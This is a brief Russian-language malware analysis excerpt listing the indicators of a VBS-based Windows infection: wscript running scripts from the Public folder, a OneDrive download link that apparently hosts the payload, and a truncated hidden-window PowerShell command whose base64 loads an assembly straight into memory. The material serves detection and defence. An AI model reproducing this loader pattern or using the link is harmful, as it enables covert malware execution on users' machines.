Техническая информация
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\f1.vbs"
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\este.vbs"
- https://onedrive.live.com/download?cid=f8867408aefd1477&resid=f8867408aefd1477%213420&authkey=aprk74la7bgauro
- C:\users\public\f1.vbs
- C:\users\public\este.vbs
- 'on####ve.live.com':443
- 'on####ve.live.com':443
- DNS ASK on####ve.live.com
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\este.vbs"' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgBq...' (со скрытым окном)